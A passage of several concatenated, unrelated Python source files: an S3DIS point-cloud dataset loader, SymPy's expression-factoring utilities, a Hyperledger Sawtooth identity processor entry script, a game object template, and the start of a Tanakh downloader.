np.float32) # k, 6
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
# to target box structure
gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data \
preprocessing pipelines. It includes the following keys:
- pts_filename (str): Filename of point clouds.
- file_name (str): Filename of point clouds.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
class _S3DISSegDataset(Custom3DSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one.
However, there is not a fixed train-test split of S3DIS. People often test
on Area_5 as suggested by `SEGCloud <https://arxiv.org/abs/1710.07563>`_.
But many papers also report the average results of 6-fold cross validation
over the 6 areas (e.g. `DGCNN <https://arxiv.org/abs/1801.07829>`_).
Therefore, we use an inner dataset for one area, and further use a dataset
wrapper to concat all the provided data in different areas.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (np.ndarray | str, optional): Precomputed index to load
data. For scenes with many points, we may sample it several times.
Defaults to None.
"""
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14)) # possibly with 'stair' class
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
"""Compute scene_idxs for data sampling.
We sample more times for scenes with more points.
"""
# when testing, we load one whole scene every time
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class serves as the API for experiments on the S3DIS Dataset.
It wraps the provided datasets of different areas.
We don't use `mmdet.datasets.dataset_wrappers.ConcatDataset` because we
need to concat the `scene_idxs` of different areas.
Please refer to the `google form <https://docs.google.com/forms/d/e/1FAIpQL
ScDimvNMCGhy_rmBA2gHfDu3naktRm6A8BPwAWWDv-Uhm6Shw/viewform?c=0&w=1>`_ for
data downloading.
Args:
data_root (str): Path of dataset root.
ann_files (list[str]): Path of several annotation files.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (list[np.ndarray] | list[str], optional): Precomputed index
to load data. For scenes with many points, we may sample it several
times. Defaults to None.
"""
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
# make sure that ann_files and scene_idxs have same length
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
# initialize some attributes as datasets[0]
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
# data_infos and scene_idxs need to be concat
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
"""Concat data_infos from several datasets to form self.data_infos.
Args:
data_infos (list[list[dict]])
"""
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
"""Concat scene_idxs from several datasets to form self.scene_idxs.
Needs to manually add offset to scene_idxs[1, 2, ...].
Args:
scene_idxs (list[np.ndarray])
"""
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
@staticmethod
def _duplicate_to_list(x, num):
"""Repeat x `num` times to form a list."""
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
"""Make ann_files as list/tuple."""
# ann_file could be str
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
"""Make scene_idxs as list/tuple."""
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
# scene_idx could be str, np.ndarray, list or tuple
if isinstance(scene_idx, str): # str
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str): # list of str
return scene_idx
if isinstance(scene_idx[0], (list, tuple, np.ndarray)): # list of idx
return scene_idx
# single idx
return self._duplicate_to_list(scene_idx, num)
|
"""Tools for manipulating of large commutative expressions. """
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
"""
Decompose power into symbolic base and integer exponent.
Examples
========
>>> from sympy.core.exprtools import decompose_power
>>> from sympy.abc import x, y
>>> decompose_power(x)
(x, 1)
>>> decompose_power(x**2)
(x, 2)
>>> decompose_power(x**(2*y))
(x**y, 2)
>>> decompose_power(x**(2*y/3))
(x**(y/3), 2)
"""
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
"""Efficient representation of ``f_1*f_2*...*f_n``. """
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
class Term(object):
"""Efficient representation of ``coeff*(numer/denom)``. """
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
def _gcd_terms(terms, isprimitive=False):
"""Helper function for :func:`gcd_terms`. If `isprimitive` is True then the
call to primitive for an Add will be skipped. This is useful when the
content has already been extrated."""
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
"""
Compute the GCD of ``terms`` and put them together. If ``isprimitive`` is
True the _gcd_terms will not run the primitive method on the terms.
``clear`` controls the removal of integers from the denominator of an Add
expression. When True, all numerical denominator will be cleared; when
False the denominators will be cleared only if all terms had numerical
denominators.
Examples
========
>>> from sympy.core import gcd_terms
>>> from sympy.abc import x, y
>>> gcd_terms((x + 1)**2*y + (x + 1)*y**2)
y*(x + 1)*(x + y + 1)
>>> gcd_terms(x/2 + 1)
(x + 2)/2
>>> gcd_terms(x/2 + 1, clear=False)
x/2 + 1
>>> gcd_terms(x/2 + y/2, clear=False)
(x + y)/2
"""
def mask(terms):
"""replace nc portions of each term with a unique Dummy symbols
and return the replacements to restore them"""
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr: # hence an Add
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
"""Remove common factors from terms in all arguments without
changing the underlying structure of the expr. No expansion or
simplification (and no processing of non-commutatives) is performed.
If radical=True then a radical common to all terms will be factored
out of any Add sub-expressions of the expr.
If clear=False (default) then coefficients will not be separated
from a single Add if they can be distributed to leave one or more
terms with integer coefficients.
Examples
========
>>> from sympy import factor_terms, Symbol, Mul, primitive
>>> from sympy.abc import x, y
>>> factor_terms(x + x*(2 + 4*y)**3)
x*(8*(2*y + 1)**3 + 1)
>>> A = Symbol('A', commutative=False)
>>> factor_terms(x*A + x*A + x*y*A)
x*(y*A + 2*A)
When clear is False, a fraction will only appear factored out of an
Add expression if all terms of the Add have coefficients that are
fractions:
>>> factor_terms(x/2 + 1, clear=False)
x/2 + 1
>>> factor_terms(x/2 + 1, clear=True)
(x + 2)/2
This only applies when there is a single Add that the coefficient
multiplies:
>>> factor_terms(x*y/2 + y, clear=True)
y*(x + 2)/2
>>> factor_terms(x*y/2 + y, clear=False) == _
True
"""
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args) # gcd_terms will fix up ordering
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
"""Return ``eq`` with non-commutative objects replaced with dummy
symbols. A dictionary that can be used to restore the original
values is returned: if it is None, the expression is
noncommutative and cannot be made commutative. The third value
returned is a list of any non-commutative symbols that appeared
in the equation.
Notes
=====
All commutative objects (other than Symbol) will be replaced;
if the only non-commutative obects are Symbols, if there is only
1 Symbol, it will be replaced; if there are more than one then
they will not be replaced; the calling routine should handle
replacements in this case since some care must be taken to keep
track of the ordering of symbols when they occur within Muls.
Examples
========
>>> from sympy.physics.secondquant import Commutator, NO, F, Fd
>>> from sympy import Dummy, symbols
>>> from sympy.abc import x, y
>>> from sympy.core.exprtools import _mask_nc
>>> A, B, C = symbols('A,B,C', commutative=False)
>>> Dummy._count = 0 # reset for doctest purposes
>>> _mask_nc(A**2 - x**2)
(_0**2 - x**2, {_0: A}, [])
>>> _mask_nc(A**2 - B**2)
(A**2 - B**2, None, [A, B])
>>> _mask_nc(1 + x*Commutator(A, B))
(_1*x + 1, {_1: Commutator(A, B)}, [A, B])
>>> _mask_nc(NO(Fd(x)*F(y)))
(_2, {_2: NO(CreateFermion(x)*AnnihilateFermion(y))}, [])
"""
expr = eq
if expr.is_commutative:
return eq, {}, []
# if there is only one nc symbol, it can be factored regularly but
# polys is going to complain, so replace it with a dummy
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# even though the noncommutative symbol may be gone, the expression
# might still appear noncommutative; if it's a non-elementary object
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip() # don't go any further
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
"""Return the factored form of ``expr`` while handling non-commutative
expressions.
**examples**
>>> from sympy.core.exprtools import factor_nc
>>> from sympy import Symbol
>>> from sympy.abc import x
>>> A = Symbol('A', commutative=False)
>>> B = Symbol('B', commutative=False)
>>> factor_nc((x**2 + 2*A*x + A**2).expand())
(x + A)**2
>>> factor_nc(((x + A)*(x + B)).expand())
(x + A)*(x + B)
"""
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
# a factor of -1, e.g. A**2 - B**2) -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
|
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import sys
import os
import argparse
import pkg_resources
# Adding the necessary path to PYTHONPATH
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
# If no toml, try loading yaml
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
# use the transaction processor zmq identity for filename
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e: # pylint: disable=broad-except
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/space/shields/shared_adv_deflector_shields.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
#!/usr/bin/env python
# coding: utf-8
"""Download and parse Tanakh from <http://mechon-mamre.org/>.
